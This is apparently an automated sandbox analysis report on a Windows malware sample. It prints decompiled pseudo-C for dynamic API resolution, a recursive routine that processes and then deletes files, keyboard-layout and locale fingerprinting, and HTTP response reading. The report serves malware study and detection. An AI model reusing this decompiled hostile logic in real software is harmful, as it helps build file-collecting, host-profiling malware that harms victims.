                                                                                                                              • GetProcAddress.KERNEL32(00000000,023376B0), ref: 00419C6D
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023365E8), ref: 00419C82
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337670), ref: 00419C98
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02336548), ref: 00419CAE
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338650), ref: 00419CC3
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023376D0), ref: 00419CE3
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023376F0), ref: 00419CF9
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337550), ref: 00419D0E
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023386B0), ref: 00419D24
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337570), ref: 00419D3A
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337590), ref: 00419D4F
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023386C8), ref: 00419D65
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337BD0), ref: 00419D7B
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337AB0), ref: 00419D90
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337AD0), ref: 00419DA6
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337A50), ref: 00419DBC
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337990), ref: 00419DD7
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337B90), ref: 00419DED
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337A70), ref: 00419E09
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023379F0), ref: 00419E24
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338668), ref: 00419E3A
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023379D0), ref: 00419E56
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338800), ref: 00419E6B
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337C10), ref: 00419E81
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338818), ref: 00419EA1
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337970), ref: 00419EB6
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023388F0), ref: 00419ECC
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338830), ref: 00419EE2
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337A10), ref: 00419EF7
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338A10), ref: 00419F0D
                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegEnumValueA), ref: 00419F21
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338980), ref: 00419F3D
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02336390), ref: 00419F5D
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337C30), ref: 00419F72
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02336408), ref: 00419F88
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337BB0), ref: 00419F9E
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338908), ref: 00419FB3
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023388C0), ref: 00419FC9
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023379B0), ref: 00419FDF
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337A30), ref: 00419FF4
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338758), ref: 0041A014
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023389C8), ref: 0041A02A
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337CB0), ref: 0041A03F
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337C90), ref: 0041A055
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337238), ref: 0041A06B
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338770), ref: 0041A080
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338848), ref: 0041A096
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338938), ref: 0041A0AC
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337BF0), ref: 0041A0CB
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338788), ref: 0041A0E1
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023387A0), ref: 0041A0F7
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337AF0), ref: 0041A10C
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337258), ref: 0041A122
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337C50), ref: 0041A138
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337A90), ref: 0041A14D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                              • String ID: HeapFree$RegEnumValueA
                                                                                                                              • API String ID: 2238633743-3819337796
                                                                                                                              • Opcode ID: 90ef07fcd7b925f46b8ad25f3b92ab2857b100e4aaa4e3dee816f5f4efc41360
                                                                                                                              • Instruction ID: 49dd401f3f8a9704e5ea376b98ecc7ad5ccb799543314d91de91546e4023b833
                                                                                                                              • Opcode Fuzzy Hash: 90ef07fcd7b925f46b8ad25f3b92ab2857b100e4aaa4e3dee816f5f4efc41360
                                                                                                                              • Instruction Fuzzy Hash: 6D624BB5900204EFC748EFA8EE9899ABBF9FB4C301B14E629E505D3360D7B49541CF68
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00420540, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 90%
                                                                                                                              			E00420540(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v276;
				void* _v280;
				struct _WIN32_FIND_DATAA _v604;
				char _v868;
				char _v1132;
				intOrPtr* _v1136;
				intOrPtr* _v1140;
				char _v1141;
				char _v1142;
				intOrPtr _v1148;
				intOrPtr _v1152;
				intOrPtr* _v1156;
				intOrPtr* _v1160;
				char _v1161;
				char _v1162;
				intOrPtr _v1168;
				intOrPtr _v1172;
				signed int _t72;
				int _t77;
				char _t78;
				int _t81;
				char _t83;
				void* _t87;
				char _t97;
				char _t98;
				void* _t99;
				intOrPtr* _t117;
				intOrPtr* _t118;
				void* _t124;
				void* _t125;
				signed int _t126;
				void* _t127;
				void* _t128;
				void* _t130;
				void* _t131;

				_t125 = __esi;
				_t124 = __edi;
				_t99 = __ebx;
				_t72 =  *0x4301f4; // 0xe687535
				_v8 = _t72 ^ _t126;
				wsprintfA( &_v276, "%s\\*", _a12);
				_t128 = _t127 + 0xc;
				_t116 =  &_v604;
				_t77 = FindFirstFileA( &_v276,  &_v604); // executed
				_v280 = _t77;
				if(_v280 != 0xffffffff) {
					do {
						_v1136 = ".";
						_v1140 =  &(_v604.cFileName);
						while(1) {
							_t117 = _v1140;
							_t78 =  *_t117;
							_v1141 = _t78;
							if(_t78 !=  *_v1136) {
								break;
							}
							if(_v1141 == 0) {
								L7:
								_v1148 = 0;
							} else {
								_t117 = _v1140;
								_t98 =  *((intOrPtr*)(_t117 + 1));
								_v1142 = _t98;
								_t19 = _v1136 + 1; // 0x2e000000
								if(_t98 !=  *_t19) {
									break;
								} else {
									_v1140 = _v1140 + 2;
									_v1136 = _v1136 + 2;
									if(_v1142 != 0) {
										continue;
									} else {
										goto L7;
									}
								}
							}
							L9:
							_v1152 = _v1148;
							if(_v1152 != 0) {
								_v1156 = "..";
								_v1160 =  &(_v604.cFileName);
								while(1) {
									_t118 = _v1160;
									_t83 =  *_t118;
									_v1161 = _t83;
									if(_t83 !=  *_v1156) {
										break;
									}
									if(_v1161 == 0) {
										L15:
										_v1168 = 0;
									} else {
										_t118 = _v1160;
										_t97 =  *((intOrPtr*)(_t118 + 1));
										_v1162 = _t97;
										_t41 = _v1156 + 1; // 0x2500002e
										if(_t97 !=  *_t41) {
											break;
										} else {
											_v1160 = _v1160 + 2;
											_v1156 = _v1156 + 2;
											if(_v1162 != 0) {
												continue;
											} else {
												goto L15;
											}
										}
									}
									L17:
									_v1172 = _v1168;
									if(_v1172 != 0) {
										wsprintfA( &_v1132, "%s\\%s", _a12,  &(_v604.cFileName));
										_t87 = E004052FA(_t125, _a8, 0x429492);
										_t130 = _t128 + 0x18;
										if(_t87 != 0) {
											wsprintfA( &_v868, "%s\\%s", _a8,  &(_v604.cFileName));
											_t131 = _t130 + 0x10;
										} else {
											wsprintfA( &_v868, "%s",  &(_v604.cFileName));
											_t131 = _t130 + 0xc;
										}
										E00419580(_a4,  &_v868,  &_v1132); // executed
										DeleteFileA( &_v1132); // executed
										E00420540(_t99, _t124, _t125, _a4,  &_v868,  &_v1132); // executed
										_t128 = _t131 + 0x18;
									} else {
										goto L18;
									}
									goto L23;
								}
								asm("sbb edx, edx");
								asm("sbb edx, 0xffffffff");
								_v1168 = _t118;
								goto L17;
							}
							goto L23;
						}
						asm("sbb edx, edx");
						asm("sbb edx, 0xffffffff");
						_v1148 = _t117;
						goto L9;
						L23:
						_t116 =  &_v604;
						_t81 = FindNextFileA(_v280,  &_v604); // executed
					} while (_t81 != 0);
					_t77 = FindClose(_v280);
				} else {
				}
				return E00404354(_t77, _t99, _v8 ^ _t126, _t116, _t124, _t125);
			}







































                                                                                                                              0x00420540
                                                                                                                              0x00420540
                                                                                                                              0x00420540
                                                                                                                              0x00420549
                                                                                                                              0x00420550
                                                                                                                              0x00420563
                                                                                                                              0x00420569
                                                                                                                              0x0042056c
                                                                                                                              0x0042057a
                                                                                                                              0x00420580
                                                                                                                              0x0042058d
                                                                                                                              0x00420594
                                                                                                                              0x00420594
                                                                                                                              0x004205a4
                                                                                                                              0x004205aa
                                                                                                                              0x004205aa
                                                                                                                              0x004205b0
                                                                                                                              0x004205b2
                                                                                                                              0x004205c0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004205c9
                                                                                                                              0x004205fc
                                                                                                                              0x004205fc
                                                                                                                              0x004205cb
                                                                                                                              0x004205cb
                                                                                                                              0x004205d1
                                                                                                                              0x004205d4
                                                                                                                              0x004205e0
                                                                                                                              0x004205e3
                                                                                                                              0x00000000
                                                                                                                              0x004205e5
                                                                                                                              0x004205e5
                                                                                                                              0x004205ec
                                                                                                                              0x004205fa
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004205fa
                                                                                                                              0x004205e3
                                                                                                                              0x00420613
                                                                                                                              0x00420619
                                                                                                                              0x00420626
                                                                                                                              0x0042062c
                                                                                                                              0x0042063c
                                                                                                                              0x00420642
                                                                                                                              0x00420642
                                                                                                                              0x00420648
                                                                                                                              0x0042064a
                                                                                                                              0x00420658
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00420661
                                                                                                                              0x00420694
                                                                                                                              0x00420694
                                                                                                                              0x00420663
                                                                                                                              0x00420663
                                                                                                                              0x00420669
                                                                                                                              0x0042066c
                                                                                                                              0x00420678
                                                                                                                              0x0042067b
                                                                                                                              0x00000000
                                                                                                                              0x0042067d
                                                                                                                              0x0042067d
                                                                                                                              0x00420684
                                                                                                                              0x00420692
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00420692
                                                                                                                              0x0042067b
                                                                                                                              0x004206ab
                                                                                                                              0x004206b1
                                                                                                                              0x004206be
                                                                                                                              0x004206dc
                                                                                                                              0x004206ee
                                                                                                                              0x004206f3
                                                                                                                              0x004206f8
                                                                                                                              0x0042072f
                                                                                                                              0x00420735
                                                                                                                              0x004206fa
                                                                                                                              0x0042070d
                                                                                                                              0x00420713
                                                                                                                              0x00420713
                                                                                                                              0x0042074a
                                                                                                                              0x00420759
                                                                                                                              0x00420771
                                                                                                                              0x00420776
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004206be
                                                                                                                              0x004206a0
                                                                                                                              0x004206a2
                                                                                                                              0x004206a5
                                                                                                                              0x00000000
                                                                                                                              0x004206a5
                                                                                                                              0x00000000
                                                                                                                              0x00420626
                                                                                                                              0x00420608
                                                                                                                              0x0042060a
                                                                                                                              0x0042060d
                                                                                                                              0x00000000
                                                                                                                              0x00420779
                                                                                                                              0x00420779
                                                                                                                              0x00420787
                                                                                                                              0x0042078d
                                                                                                                              0x0042079c
                                                                                                                              0x00000000
                                                                                                                              0x0042058f
                                                                                                                              0x004207af

                                                                                                                              APIs
                                                                                                                              • wsprintfA.USER32 ref: 00420563
                                                                                                                              • FindFirstFileA.KERNELBASE(?,?), ref: 0042057A
                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00420787
                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 0042079C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                              • String ID: %s\%s$%s\%s$%s\*
                                                                                                                              • API String ID: 180737720-445461498
                                                                                                                              • Opcode ID: b36d20a79696500d5966cc1085c2a3eae8138d24e48df022eca772712e802837
                                                                                                                              • Instruction ID: 325be172129785ba22ad8cdf846aec29f32f218cb4471343c49e7a9d9cf57eda
                                                                                                                              • Opcode Fuzzy Hash: b36d20a79696500d5966cc1085c2a3eae8138d24e48df022eca772712e802837
                                                                                                                              • Instruction Fuzzy Hash: C7618CB0A042289FCB24CF64EC44BEAB7B5AB48304F4486DAE64952242D7759E89CF19
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041AA60, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 88memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 95%
                                                                                                                              			E0041AA60(void* __ebx, void* __edi, void* __esi) {
				void* _v8;
				signed int _v12;
				char _v524;
				int _v528;
				int _v532;
				void* _v536;
				signed int _v540;
				signed int _t34;
				void* _t56;
				void* _t70;
				void* _t71;
				signed int _t72;
				void* _t73;
				void* _t74;

				_t71 = __esi;
				_t70 = __edi;
				_t56 = __ebx;
				_t34 =  *0x4301f4; // 0xe687535
				_v12 = _t34 ^ _t72;
				_v536 = HeapAlloc(GetProcessHeap(), 0, 0x1f4);
				_v528 = 0;
				_v8 = 0;
				_v532 = GetKeyboardLayoutList(0, 0);
				_v8 = LocalAlloc(0x40, _v532 << 2);
				_t65 = _v532;
				_v532 = GetKeyboardLayoutList(_v532, _v8);
				_v540 = 0;
				while(_v540 < _v532) {
					GetLocaleInfoA( *(_v8 + _v540 * 4) & 0x0000ffff, 2,  &_v524, 0x200); // executed
					if(_v528 == 0) {
						wsprintfA(_v536, "%s",  &_v524);
						_t74 = _t73 + 0xc;
					} else {
						wsprintfA(_v536, "%s / %s", _v536,  &_v524);
						_t74 = _t73 + 0x10;
					}
					_t65 = _v528 + 1;
					_v528 = _v528 + 1;
					E004091C0( &_v524, 0, 0x200);
					_t73 = _t74 + 0xc;
					_v540 = _v540 + 1;
				}
				if(_v8 != 0) {
					LocalFree(_v8);
				}
				return E00404354(_v536, _t56, _v12 ^ _t72, _t65, _t70, _t71);
			}

















                                                                                                                              0x0041aa60
                                                                                                                              0x0041aa60
                                                                                                                              0x0041aa60
                                                                                                                              0x0041aa69
                                                                                                                              0x0041aa70
                                                                                                                              0x0041aa87
                                                                                                                              0x0041aa8d
                                                                                                                              0x0041aa97
                                                                                                                              0x0041aaa8
                                                                                                                              0x0041aac0
                                                                                                                              0x0041aac7
                                                                                                                              0x0041aad4
                                                                                                                              0x0041aada
                                                                                                                              0x0041aaf5
                                                                                                                              0x0041ab23
                                                                                                                              0x0041ab30
                                                                                                                              0x0041ab6a
                                                                                                                              0x0041ab70
                                                                                                                              0x0041ab32
                                                                                                                              0x0041ab4c
                                                                                                                              0x0041ab52
                                                                                                                              0x0041ab52
                                                                                                                              0x0041ab79
                                                                                                                              0x0041ab7c
                                                                                                                              0x0041ab90
                                                                                                                              0x0041ab95
                                                                                                                              0x0041aaef
                                                                                                                              0x0041aaef
                                                                                                                              0x0041aba1
                                                                                                                              0x0041aba7
                                                                                                                              0x0041aba7
                                                                                                                              0x0041abc0

                                                                                                                              APIs
                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000001F4), ref: 0041AA7A
                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0041AA81
                                                                                                                              • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 0041AAA2
                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 0041AABA
                                                                                                                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 0041AACE
                                                                                                                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041AB23
                                                                                                                              • wsprintfA.USER32 ref: 0041AB4C
                                                                                                                              • wsprintfA.USER32 ref: 0041AB6A
                                                                                                                              • _memset.LIBCMT ref: 0041AB90
                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 0041ABA7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocHeapKeyboardLayoutListLocalwsprintf$FreeInfoLocaleProcess_memset
                                                                                                                              • String ID: %s / %s
                                                                                                                              • API String ID: 2849719339-2910687431
                                                                                                                              • Opcode ID: 1cfaaa4263921e670d447bf10fd0bbaabef4cbf546bfbcacf261dfb8817fc39c
                                                                                                                              • Instruction ID: b0ee2a266da5aaddb125032d73e6c8a54dd55c1a0deb21e767daa8be60d16efc
                                                                                                                              • Opcode Fuzzy Hash: 1cfaaa4263921e670d447bf10fd0bbaabef4cbf546bfbcacf261dfb8817fc39c
                                                                                                                              • Instruction Fuzzy Hash: 003149B0A4021CDBDB64DF54DD89BE9B7B4FB48304F1042D9E519A6281CBB46EC4CF59
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00421CF0, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 313networkfileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 69%
                                                                                                                              			E00421CF0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* _a4) {
				DWORD* _v8;
				char _v16;
				signed int _v20;
				char _v48;
				char _v76;
				long _v80;
				DWORD* _v84;
				DWORD* _v88;
				char _v351;
				void _v352;
				intOrPtr _v356;
				DWORD* _v360;
				DWORD* _v364;
				DWORD* _v368;
				intOrPtr _v372;
				signed int _v376;
				DWORD* _v380;
				DWORD* _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				signed int _t183;
				signed int _t184;
				intOrPtr _t186;
				int _t191;
				intOrPtr _t193;
				intOrPtr _t205;
				intOrPtr _t215;
				intOrPtr _t243;
				intOrPtr _t251;
				void* _t253;
				intOrPtr _t260;
				intOrPtr _t289;
				signed int _t351;
				void* _t352;
				void* _t353;
				void* _t354;
				void* _t355;
				void* _t356;

				_t350 = __esi;
				_t349 = __edi;
				_t253 = __ebx;
				_push(0xffffffff);
				_push(E004265F4);
				_push( *[fs:0x0]);
				_t353 = _t352 - 0x19c;
				_t183 =  *0x4301f4; // 0xe687535
				_t184 = _t183 ^ _t351;
				_v20 = _t184;
				_push(_t184);
				 *[fs:0x0] =  &_v16;
				_v420 = __ecx;
				_t186 = _v420;
				_t362 =  *((intOrPtr*)(_t186 + 0x28));
				if( *((intOrPtr*)(_t186 + 0x28)) == 0) {
					 *((intOrPtr*)(_v420 + 0x30)) = 0x7800;
					_push( *((intOrPtr*)(_v420 + 0x30))); // executed
					_t251 = E00404349(__edi, __esi, _t362); // executed
					_t353 = _t353 + 4;
					_v392 = _t251;
					 *((intOrPtr*)(_v420 + 0x28)) = _v392;
					 *(_v420 + 0x34) = 0;
				}
				_v84 =  *(_v420 + 0x34);
				_v80 = 0;
				_v88 = 0;
				InternetSetFilePointer(_a4, 0, 0, 0, 0);
				do {
					_t191 = InternetReadFile(_a4,  *((intOrPtr*)(_v420 + 0x28)) +  *(_v420 + 0x34), 0x3e8,  &_v80); // executed
					_v88 = _t191;
					 *(_v420 + 0x34) =  *(_v420 + 0x34) + _v80;
					_t193 = _v420;
					_t260 = _v420;
					_t363 =  *((intOrPtr*)(_t193 + 0x30)) -  *((intOrPtr*)(_t260 + 0x34)) - 0x3e8;
					if( *((intOrPtr*)(_t193 + 0x30)) -  *((intOrPtr*)(_t260 + 0x34)) <= 0x3e8) {
						 *((intOrPtr*)(_v420 + 0x30)) =  *((intOrPtr*)(_v420 + 0x30)) + 0x7800;
						_push( *((intOrPtr*)(_v420 + 0x30))); // executed
						_t243 = E00404349(_t349, _t350, _t363); // executed
						_v396 = _t243;
						_v356 = _v396;
						E00409240(_v356,  *((intOrPtr*)(_v420 + 0x28)),  &(( *(_v420 + 0x34))[0]));
						_v400 =  *((intOrPtr*)(_v420 + 0x28));
						_push(_v400); // executed
						E00405122(); // executed
						_t353 = _t353 + 0x14;
						 *((intOrPtr*)(_v420 + 0x28)) = _v356;
					}
				} while (_v88 != 0 && _v80 > 0);
				_v80 = 0x103;
				_v352 = 0;
				E004091C0( &_v351, 0, 0x103);
				_t354 = _t353 + 0xc;
				if(HttpQueryInfoA(_a4, 0x1d,  &_v352,  &_v80, 0) != 0) {
					_v368 = 0;
					_v360 = 0;
					_v364 = 0;
					_v364 =  *0x4327a8(0x4271e0, 0, 1, 0x4271d0,  &_v368);
					if(_v364 >= 0) {
						_t369 = _v368;
						if(_v368 != 0) {
							E004011C0( &_v48,  &_v352);
							_v8 = 0;
							_t205 = E00421BE0(_t253, _t349, _t350, _t369,  &_v76,  &_v48);
							_t355 = _t354 + 8;
							_v424 = _t205;
							_v428 = _v424;
							_v8 = 1;
							_v364 =  *((intOrPtr*)( *((intOrPtr*)( *_v368 + 0x10))))(_v368, E004020E0(_v428), L"text",  &_v360);
							_v8 = 0;
							E004020C0( &_v76);
							_v8 = 0xffffffff;
							E004012D0( &_v48);
							if(_v364 >= 0) {
								_t371 = _v360;
								if(_v360 != 0) {
									_v376 = ( *(_v420 + 0x34) - _v84) * 7;
									_t215 = E00404349(_t349, _t350, _t371);
									_t356 = _t355 + 4;
									_v404 = _t215;
									_v372 = _v404;
									_v384 = 0;
									_v380 = 0;
									_v364 =  *((intOrPtr*)( *((intOrPtr*)( *_v360 + 0x10))))(_v360, 0,  *(_v420 + 0x34) - _v84,  *((intOrPtr*)(_v420 + 0x28)) + _v84, _v376, _v372,  *(_v420 + 0x34) - _v84,  &_v380,  &_v384, 0, _v376);
									if(_v364 >= 0) {
										_t289 = _v420;
										_t373 =  *((intOrPtr*)(_t289 + 0x30)) - _v84 + _v384;
										if( *((intOrPtr*)(_t289 + 0x30)) <= _v84 + _v384) {
											 *((intOrPtr*)(_v420 + 0x30)) = _v84 +  &(_v384[0xfa]);
											_push( *((intOrPtr*)(_v420 + 0x30)));
											_v408 = E00404349(_t349, _t350, _t373);
											_v388 = _v408;
											E0040518C( *((intOrPtr*)(_v420 + 0x30)), _v388,  *((intOrPtr*)(_v420 + 0x30)),  *((intOrPtr*)(_v420 + 0x28)), _v84);
											_v412 =  *((intOrPtr*)(_v420 + 0x28));
											_push(_v412);
											E00405122();
											_t356 = _t356 + 0x18;
											 *((intOrPtr*)(_v420 + 0x28)) = _v388;
										}
										E0040518C( *((intOrPtr*)(_v420 + 0x28)) + _v84,  *((intOrPtr*)(_v420 + 0x28)) + _v84,  *((intOrPtr*)(_v420 + 0x30)) - _v84, _v372, _v384);
										_t356 = _t356 + 0x10;
										 *(_v420 + 0x34) = _v84 + _v384;
									}
									_v416 = _v372;
									E00405122();
									 *((intOrPtr*)( *((intOrPtr*)( *_v360 + 8))))(_v360, _v416);
								}
							}
							 *((intOrPtr*)( *((intOrPtr*)( *_v368 + 8))))(_v368);
						}
					}
				}
				 *( *((intOrPtr*)(_v420 + 0x28)) +  *(_v420 + 0x34)) = 0;
				 *[fs:0x0] = _v16;
				return E00404354( *(_v420 + 0x34) - _v84, _t253, _v20 ^ _t351,  *(_v420 + 0x34), _t349, _t350);
			}


















































                                                                                                                              0x00421cf0
                                                                                                                              0x00421cf0
                                                                                                                              0x00421cf0
                                                                                                                              0x00421cf3
                                                                                                                              0x00421cf5
                                                                                                                              0x00421d00
                                                                                                                              0x00421d01
                                                                                                                              0x00421d07
                                                                                                                              0x00421d0c
                                                                                                                              0x00421d0e
                                                                                                                              0x00421d11
                                                                                                                              0x00421d15
                                                                                                                              0x00421d1b
                                                                                                                              0x00421d21
                                                                                                                              0x00421d27
                                                                                                                              0x00421d2b
                                                                                                                              0x00421d33
                                                                                                                              0x00421d43
                                                                                                                              0x00421d44
                                                                                                                              0x00421d49
                                                                                                                              0x00421d4c
                                                                                                                              0x00421d5e
                                                                                                                              0x00421d67
                                                                                                                              0x00421d67
                                                                                                                              0x00421d77
                                                                                                                              0x00421d7a
                                                                                                                              0x00421d81
                                                                                                                              0x00421d94
                                                                                                                              0x00421d9a
                                                                                                                              0x00421dba
                                                                                                                              0x00421dc0
                                                                                                                              0x00421dd5
                                                                                                                              0x00421dd8
                                                                                                                              0x00421dde
                                                                                                                              0x00421dea
                                                                                                                              0x00421df0
                                                                                                                              0x00421e0b
                                                                                                                              0x00421e17
                                                                                                                              0x00421e18
                                                                                                                              0x00421e20
                                                                                                                              0x00421e2c
                                                                                                                              0x00421e50
                                                                                                                              0x00421e61
                                                                                                                              0x00421e6d
                                                                                                                              0x00421e6e
                                                                                                                              0x00421e73
                                                                                                                              0x00421e82
                                                                                                                              0x00421e82
                                                                                                                              0x00421e85
                                                                                                                              0x00421e95
                                                                                                                              0x00421e9c
                                                                                                                              0x00421eb1
                                                                                                                              0x00421eb6
                                                                                                                              0x00421ed4
                                                                                                                              0x00421eda
                                                                                                                              0x00421ee4
                                                                                                                              0x00421eee
                                                                                                                              0x00421f13
                                                                                                                              0x00421f20
                                                                                                                              0x00421f26
                                                                                                                              0x00421f2d
                                                                                                                              0x00421f3d
                                                                                                                              0x00421f42
                                                                                                                              0x00421f51
                                                                                                                              0x00421f56
                                                                                                                              0x00421f59
                                                                                                                              0x00421f65
                                                                                                                              0x00421f6b
                                                                                                                              0x00421f9b
                                                                                                                              0x00421fa1
                                                                                                                              0x00421fa8
                                                                                                                              0x00421fad
                                                                                                                              0x00421fb7
                                                                                                                              0x00421fc3
                                                                                                                              0x00421fc9
                                                                                                                              0x00421fd0
                                                                                                                              0x00421fe5
                                                                                                                              0x00421ff2
                                                                                                                              0x00421ff7
                                                                                                                              0x00421ffa
                                                                                                                              0x00422006
                                                                                                                              0x0042200c
                                                                                                                              0x00422016
                                                                                                                              0x0042207b
                                                                                                                              0x00422088
                                                                                                                              0x00422097
                                                                                                                              0x0042209d
                                                                                                                              0x004220a0
                                                                                                                              0x004220bc
                                                                                                                              0x004220c8
                                                                                                                              0x004220d1
                                                                                                                              0x004220dd
                                                                                                                              0x00422102
                                                                                                                              0x00422113
                                                                                                                              0x0042211f
                                                                                                                              0x00422120
                                                                                                                              0x00422125
                                                                                                                              0x00422134
                                                                                                                              0x00422134
                                                                                                                              0x0042215f
                                                                                                                              0x00422164
                                                                                                                              0x00422176
                                                                                                                              0x00422176
                                                                                                                              0x0042217f
                                                                                                                              0x0042218c
                                                                                                                              0x004221a6
                                                                                                                              0x004221a6
                                                                                                                              0x00421fd0
                                                                                                                              0x004221ba
                                                                                                                              0x004221ba
                                                                                                                              0x00421f2d
                                                                                                                              0x00421f20
                                                                                                                              0x004221ce
                                                                                                                              0x004221e1
                                                                                                                              0x004221f6

                                                                                                                              APIs
                                                                                                                              • InternetSetFilePointer.WININET(0042280B,00000000,00000000,00000000,00000000), ref: 00421D94
                                                                                                                              • InternetReadFile.WININET(0042280B,?,000003E8,00000000), ref: 00421DBA
                                                                                                                              • _memset.LIBCMT ref: 00421EB1
                                                                                                                              • HttpQueryInfoA.WININET(0042280B,0000001D,00000000,00000103,00000000), ref: 00421ECC
                                                                                                                                • Part of subcall function 00421BE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00421C32
                                                                                                                                • Part of subcall function 00421BE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,0042654F,000000FF,0E687535,?,?,?,?,?,?,?,00000000,0042654F), ref: 00421C79
                                                                                                                              • _memcpy_s.LIBCMT ref: 00422102
                                                                                                                              • _memcpy_s.LIBCMT ref: 0042215F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
